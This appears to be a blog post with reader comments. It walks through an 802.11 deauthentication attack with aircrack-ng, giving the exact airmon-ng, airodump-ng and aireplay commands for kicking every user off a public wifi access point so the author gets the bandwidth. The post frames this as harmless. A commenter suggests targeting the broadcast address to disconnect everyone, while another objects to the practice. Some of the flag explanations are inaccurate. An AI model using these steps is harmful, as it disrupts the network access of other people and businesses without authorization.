Do you ever connect to the free wifi at your local tea lounge and get assigned an address like 192.168.1.148? Are those 47 other users sucking up all the bandwidth, preventing you from reading that webpage or checking your email for that important message? Has the wireless AP simply crashed under all the load of those hippie mac users continuously reading LOLcats for no good reason?
This happens to me every so often and I use a simple, harmless, and effective technique to deal with it called an 802.11 deauthentication attack. I use aircrack-ng (available on a BackTrack live CD) to temporarily knock everyone off the AP to unclog its pipes and allow you to reach the internets. This blog post will walk you through how to do this yourself if you’re ever stuck in the same situation.
First, boot up to BackTrack if you don’t already have aircrack-ng installed and configured.
Second, you need to configure your wireless card for passive monitoring. I have an atheros card and I do it like this. If you have a different card, the interface names may be different.
# airmon-ng stop ath0 # airmon-ng start wifi0
Third, you need to sniff for the target AP’s MAC address and channel. Once you see your target AP come up in the airodump-ng list, press CTRL+C to stop airodump-ng and open a new window so you can refer to this one as a reference.
# airodump-ng ath0 [CTRL+C] -- save this window!
Fourth, you need to set your card to listen on the same channel as your target. Here, my target is on channel 9.
# airmon-ng stop ath0 # airmon-ng start wifi0 9
Fifth and last, you feed the information you’ve gathered to aireplay-ng to construct fake deauthentication packets. This will temporarily knock everyone off the target AP, hopefully unclogging its pipes and allowing you to reach the internets.
# aireplay -0 50 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 is for a deauth attack
- 50 is for the number of times to repeat the attack
- -a is the for the access point MAC address
- -c is for your MAC address (you can find it with ‘iwconfig’)
- ath0 is for the interface previously configured with airmon-ng
Once the attack ends (after 50 packets) or you CTRL+C it, everyone will be able to join the AP again, so quickly reboot and connect as normal.
This solves 99% of my coffee shop/hotel wifi problems. I hope it works for you!
This seems a bit asinine, to think that your desire to check your email should take priority over the less technologically advanced patrons of the public wifi spot. If I were the owner of the business you do this to, I’d be fairly upset when / if I discovered you are actively blocking or resetting other guests’ connection to the web I provide for them to use.
Using a deauthentication attack only kicks off clients for an instant, not permanently, and it is extremely effective at resolving problems with overloaded APs.
Don’t misinterpret my pathetic attempts at comic relief with being malevolent.
I *never* connect to unsecured wireless networks anymore. Not after hearing about all the fun and profit you can have with tools such as KARMA.
Can’t wait for a nationwide rollout of 4G cell networks which implement at least a basic form of authentication / encryption.
I was wondering… did u put your own mac address in the example? (-c 00:0F:B5:34:30:30 ath0)
for security reasons you should write 00:11:22:33:44:55… anyway… And second question.. isn`t this attack disconects your own interface from the AP and reconect it again the number of times that you want? (you choose 50 times) to capture more packets due to the trafic generation? maybe… and im just speculating you should have made the attack to the broadcast address (ff:ff:ff:ff:ff:ff:) so everyone get disconected from the AP?
Sorry if i made mistakes in my poor english